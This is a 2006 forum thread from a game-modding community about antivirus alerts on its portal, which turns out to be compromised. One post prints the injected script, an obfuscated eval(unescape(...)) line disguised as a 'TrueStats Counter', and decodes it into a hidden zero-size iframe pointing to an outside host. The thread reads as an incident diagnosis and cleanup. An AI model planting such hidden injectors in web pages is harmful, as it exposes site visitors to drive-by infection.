Author Topic: (Solved) Virus Alert when loading PPG main page  (Read 3797 times)

Offline Ashara

  • Tired
  • Planewalker
  • *****
  • Posts: 784
(Solved) Virus Alert when loading PPG main page
« on: July 30, 2006, 12:57:40 PM »
Guys, every time I load PPG main page I get alert for this virus:

http://www.f-secure.com/v-descs/exploit.shtml
« Last Edit: July 30, 2006, 10:16:26 PM by jcompton »
Hang in there. I'll try to make you glad you did.
—George R.R. Martin

There is nothing better than imagining other worlds [...] to forget the painful one we live in. At least so I thought then. I hadn't yet realized that, imagining other worlds, you end up changing this one.
-Umberto Eco, Baudolino

Three mods you shall make - one too bad and one to dread and one to love.

Offline Phoenix

  • Planewalker
  • *****
  • Posts: 7
Re: Virus Alert when loading PPG main page
« Reply #1 on: July 30, 2006, 02:09:10 PM »
Yeah, happens to me too.

Offline berelinde

  • Planewalker
  • *****
  • Posts: 1188
  • Gender: Female
    • Gavin, cleric of Lathander, for Tutu
Re: Virus Alert when loading PPG main page
« Reply #2 on: July 30, 2006, 02:27:13 PM »
Yeah, my antiviral software caught it in a virus scan. But I thought it was because someone in my house was looking at smut. I guess that "someone" was me!

Offline cmorgan

  • Planewalker
  • *****
  • Posts: 1424
  • Gender: Male
  • Searcher of Bugs
Re: Virus Alert when loading PPG main page
« Reply #3 on: July 30, 2006, 03:20:13 PM »
Yep, confirmed here as well. McAffee keeps deleting the infected file, and gives the following info:

Exploit-ByteVerify

Virus Profile: Exploit-ByteVerify
Risk Assessment   
  - Home Users: Low
  - Corporate Users: Low
Date Discovered: 4/9/2003
Date Added: 4/22/2003
Origin: Unknown
Length: Varies
Type: Trojan
SubType: Exploit
DAT Required: 4258

Virus Characteristics
This detection covers Java applets that attempt to exploit the Microsoft Security Bulletin MS03-011 vulnerability. This severity of this vulnerability is considered to be critical. It allows an attacker to execute malicious code, simply by visiting an infectious website. Detections of this exploit do not necessarily mean that any malicious code was executed. It simply means that a Java applet was found to contain the exploit code. Conversely malicious code may have been run, which could result in any number of modifications to the system.
All vulnerable systems should apply the patch from Microsoft. Patched systems are immune from the effects of the exploit code. However, detection will still occur on files attempting to make use of this exploit.

Indications of Infection
There are no obvious signs of infection. AVERT has received field samples that use this exploit to create a registry script file, and merge it into the system registry. This script simply altered the default start page of Internet Explorer.
Method of Infection
This exploit makes use of a security vulnerability affecting Internet Explorer and certain email clients, such as Outlook and Outlook Express.

Offline jcompton

  • Niche Exploiter
  • Administrator
  • Planewalker
  • *****
  • Posts: 7246
Re: Virus Alert when loading PPG main page
« Reply #4 on: July 30, 2006, 04:25:26 PM »
I'm going to guess this is a false positive, but I'll look into it.
Cespenar says, "Kelsey and friends be at the Pocket Plane? Ohhh yesssss!" http://www.pocketplane.net

Offline the bigg

  • The Avatar of Fighter / Thieves
  • Planewalker
  • *****
  • Posts: 3804
  • Gender: Male
Re: Virus Alert when loading PPG main page
« Reply #5 on: July 30, 2006, 04:31:59 PM »
I'm going to guess this is a false positive, but I'll look into it.
NoScript claims that www.pocketplane.net is trying to execute some script located somewhere at xp-update.net . The page code is obfuscated to hide its content, which is another thing hinting at malicious code having been implanted there (probably by a third party cracker who used some kind of exploit - I'd recommend updating Mambo and having all LAMP being updated, after removing the code which has been cracked in).

EDIT: I'd point my finger at this portion of code

Code: [Select]
<!-- Begin TrueStats Counter -->
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%78%70%2D%75%70%64%61%74%65%2E%6E%65%74%2F%63%6F%75%6E%74%2F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%20%68%65%69%67%68%74%3D%27%30%27%20%77%69%64%74%68%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E%22%29"))</script>

<!-- End TrueStats Counter -->
It's right below the <body> item. I'll post a translation of the gibberish ASAP.

EDIT2:

the suspicious code unescaped:
Code: [Select]
document.write("<iframe src='http://xp-update.net/count/' frameborder='0' height='0' width='0'></iframe>")
Bingo.
« Last Edit: July 30, 2006, 04:38:06 PM by the bigg »
Author or Co-Author: WeiDU (http://j.mp/bLtjOn) - Widescreen (http://j.mp/aKAiqG) - Generalized Biffing (http://j.mp/aVgw3U) - Refinements (http://j.mp/bLHoCc) - TB#Tweaks (http://j.mp/ba02Eg) - IWD2Tweaks (http://j.mp/98OFYY) - TB#Characters (http://j.mp/ak8J55) - Traify Tool (http://j.mp/g1Ry9A) - Some mods that I won't mention in public
Maintainer: Semi-Multi Clerics (http://j.mp/9UeIwB) - Nalia Mod (http://j.mp/dng9l0) - Nvidia Fix (http://j.mp/aRWjjg)
Code dumps: Detect custom secondary types (http://j.mp/hVzzXG) - Stutter Investigator (http://j.mp/gdtBn8)

If possible, send diffs, translations and other contributions using Git (http://j.mp/aBZFrq).

Offline Captn_Immort

  • Love Boat Captain
  • Planewalker
  • *****
  • Posts: 79
  • Gender: Female
  • Take the reins and steer us towards the clear
    • Clan DLAN
Re: Virus Alert when loading PPG main page
« Reply #6 on: July 30, 2006, 04:42:30 PM »
I have AVG here installed and it says its a trojan.
...and yeah its executing some script :s It opens a DOS window :/
DialogChecker makes dealing with TRA. files a lot easier! New tool for translators and modders with multi-language mods.

CLAN DLAN, your friendly neighborhood spanish community. Woo!

If you need my assistance with a translation or update of a translation please send me a PM or email. Thanks!!

Offline jcompton

  • Niche Exploiter
  • Administrator
  • Planewalker
  • *****
  • Posts: 7246
Re: Virus Alert when loading PPG main page
« Reply #7 on: July 30, 2006, 04:47:19 PM »
Yes, not a false positive, I've taken the portal offline and am working on addressing it.
Cespenar says, "Kelsey and friends be at the Pocket Plane? Ohhh yesssss!" http://www.pocketplane.net

Offline SimDing0™

  • Back In Black
  • Global Moderator
  • Planewalker
  • *****
  • Posts: 3496
  • Gender: Male
  • Word Enhancer
Re: Virus Alert when loading PPG main page
« Reply #8 on: July 30, 2006, 04:56:50 PM »
G3 have a frontpage, and we have a forum.

Are you thinking what I'm thinking?! :)

Offline berelinde

  • Planewalker
  • *****
  • Posts: 1188
  • Gender: Female
    • Gavin, cleric of Lathander, for Tutu
Re: Virus Alert when loading PPG main page
« Reply #9 on: July 30, 2006, 05:06:28 PM »
Depends on what you're thinking.

But the issues could be entirely unrelated.

Offline Macready

  • Planewalker
  • *****
  • Posts: 1801
    • EasyTutu
Re: Virus Alert when loading PPG main page
« Reply #10 on: July 30, 2006, 05:47:17 PM »
Are you thinking what I'm thinking?! :)

PocketGibberling.eu
EasyTutu: Tutu installation made simple.

Offline Drew

  • Kind of a prick
  • Planewalker
  • *****
  • Posts: 851
  • Gender: Male
Re: Virus Alert when loading PPG main page
« Reply #11 on: July 30, 2006, 05:48:10 PM »
Are you thinking what I'm thinking?! :)
I don't think that a joining of PPG and G3 would be the best idea, Sim.  As it stands now, PPG does most of its bickering with spellhold, while G3 bickers mostly with BWL.  If G3 and PPG were to merge, we would be flanked.
Poor baby. Couldn't find a fight anywhere else so you had to come here, huh. -Cybersquirt

Offline jcompton

  • Niche Exploiter
  • Administrator
  • Planewalker
  • *****
  • Posts: 7246
Re: Virus Alert when loading PPG main page
« Reply #12 on: July 30, 2006, 06:07:31 PM »
Quick update: We've upgraded (migrated, actually, to different portal software) and will be working on getting the template modified for the new software so that the portal actually shows all the information it is supposed to. Things might look a little off for a few days, but I will prioritize getting the basic "here are the mods and here are the DL links" up. We should avoid the need for Compton's Hastily Assembled HTML this time.

It was probably a SQL injection vulnerability in the >2 year old version of Mambo we were using.

The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.
Cespenar says, "Kelsey and friends be at the Pocket Plane? Ohhh yesssss!" http://www.pocketplane.net

Offline berelinde

  • Planewalker
  • *****
  • Posts: 1188
  • Gender: Female
    • Gavin, cleric of Lathander, for Tutu
Re: Virus Alert when loading PPG main page
« Reply #13 on: July 30, 2006, 07:14:07 PM »
Are you thinking what I'm thinking?! :)
I don't think that a joining of PPG and G3 would be the best idea, Sim.  As it stands now, PPG does most of its bickering with spellhold, while G3 bickers mostly with BWL.  If G3 and PPG were to merge, we would be flanked.

Or unified, depending on your point of view.

The downside would be that if the site did go down for some reason, we players would not have a forum.

Offline jcompton

  • Niche Exploiter
  • Administrator
  • Planewalker
  • *****
  • Posts: 7246
Re: Virus Alert when loading PPG main page
« Reply #14 on: July 30, 2006, 09:20:01 PM »
Almost back up and running. I have a very wonderful wife.
Cespenar says, "Kelsey and friends be at the Pocket Plane? Ohhh yesssss!" http://www.pocketplane.net

Offline jcompton

  • Niche Exploiter
  • Administrator
  • Planewalker
  • *****
  • Posts: 7246
Re: (Solved) Virus Alert when loading PPG main page
« Reply #15 on: July 30, 2006, 10:16:14 PM »
Okay, well, that was exciting.

My apologies for the inconvenience, particularly to anybody who may have regrettably been affected by the trojan. The portal has been updated from the rickety old build of Mambo to a shiny new version of Joomla. There are some minor cosmetic changes with the ported template which we'll address or work around over the next few days, but the portal should at least Work again, without any bizarro code bogging it down.
Cespenar says, "Kelsey and friends be at the Pocket Plane? Ohhh yesssss!" http://www.pocketplane.net

Offline Avenger_teambg

  • Planewalker
  • *****
  • Posts: 399
Re: (Solved) Virus Alert when loading PPG main page
« Reply #16 on: July 31, 2006, 01:59:05 AM »
Well, eventually everyone gets screwed, congrats for recovering so fast.
Good to know why my browser cache contained seemingly false positive virus alerts :)

Offline Captn_Immort

  • Love Boat Captain
  • Planewalker
  • *****
  • Posts: 79
  • Gender: Female
  • Take the reins and steer us towards the clear
    • Clan DLAN
Re: Virus Alert when loading PPG main page
« Reply #17 on: July 31, 2006, 02:40:59 AM »
The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.

Im curious.
DialogChecker makes dealing with TRA. files a lot easier! New tool for translators and modders with multi-language mods.

CLAN DLAN, your friendly neighborhood spanish community. Woo!

If you need my assistance with a translation or update of a translation please send me a PM or email. Thanks!!

Offline Ashara

  • Tired
  • Planewalker
  • *****
  • Posts: 784
Re: (Solved) Virus Alert when loading PPG main page
« Reply #18 on: July 31, 2006, 04:39:53 AM »
Thanks, JC. I guess it's time to go drink the health of the Admins who keep the sites afloat :)
Hang in there. I'll try to make you glad you did.
—George R.R. Martin

There is nothing better than imagining other worlds [...] to forget the painful one we live in. At least so I thought then. I hadn't yet realized that, imagining other worlds, you end up changing this one.
-Umberto Eco, Baudolino

Three mods you shall make - one too bad and one to dread and one to love.

Offline berelinde

  • Planewalker
  • *****
  • Posts: 1188
  • Gender: Female
    • Gavin, cleric of Lathander, for Tutu
Re: (Solved) Virus Alert when loading PPG main page
« Reply #19 on: July 31, 2006, 06:35:06 AM »
Ashara: at 4:39 AM? Maybe you could put it off a few hours ;D

Anyway, congratulations on the quick fix. That was hardly any time.

Offline jcompton

  • Niche Exploiter
  • Administrator
  • Planewalker
  • *****
  • Posts: 7246
Re: (Solved) Virus Alert when loading PPG main page
« Reply #20 on: July 31, 2006, 08:31:07 AM »
Good to know why my browser cache contained seemingly false positive virus alerts :)

Every few months or so there's a "your mod has a virus in it" alert which is invariably somebody's virus scanner being overzealous about the WeiDU executable or an NSIS archive or something like that, so my first impulse was that this was another situation like that. But, it wasn't.

The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.

Im curious.

Scroll up, the bigg decodes the command and shows you what it was trying to do. Do not follow the link unless you are, like, using wget on a vxWorks machine or something equally safe.
Cespenar says, "Kelsey and friends be at the Pocket Plane? Ohhh yesssss!" http://www.pocketplane.net

Offline Ashara

  • Tired
  • Planewalker
  • *****
  • Posts: 784
Re: (Solved) Virus Alert when loading PPG main page
« Reply #21 on: July 31, 2006, 09:02:07 AM »
Quote
Ashara: at 4:39 AM? Maybe you could put it off a few hours.

Not if you are drinking coffee... which make sense, seeing how it's the lifeblood of many a project.
Hang in there. I'll try to make you glad you did.
—George R.R. Martin

There is nothing better than imagining other worlds [...] to forget the painful one we live in. At least so I thought then. I hadn't yet realized that, imagining other worlds, you end up changing this one.
-Umberto Eco, Baudolino

Three mods you shall make - one too bad and one to dread and one to love.

Offline Captn_Immort

  • Love Boat Captain
  • Planewalker
  • *****
  • Posts: 79
  • Gender: Female
  • Take the reins and steer us towards the clear
    • Clan DLAN
Re: (Solved) Virus Alert when loading PPG main page
« Reply #22 on: July 31, 2006, 09:57:08 AM »
Quote
The trojan seemed to be designed to hijack IE and take it to a different page, incidentally.

Im curious.

Scroll up, the bigg decodes the command and shows you what it was trying to do. Do not follow the link unless you are, like, using wget on a vxWorks machine or something equally safe.

Oh, sorry, thanks.
DialogChecker makes dealing with TRA. files a lot easier! New tool for translators and modders with multi-language mods.

CLAN DLAN, your friendly neighborhood spanish community. Woo!

If you need my assistance with a translation or update of a translation please send me a PM or email. Thanks!!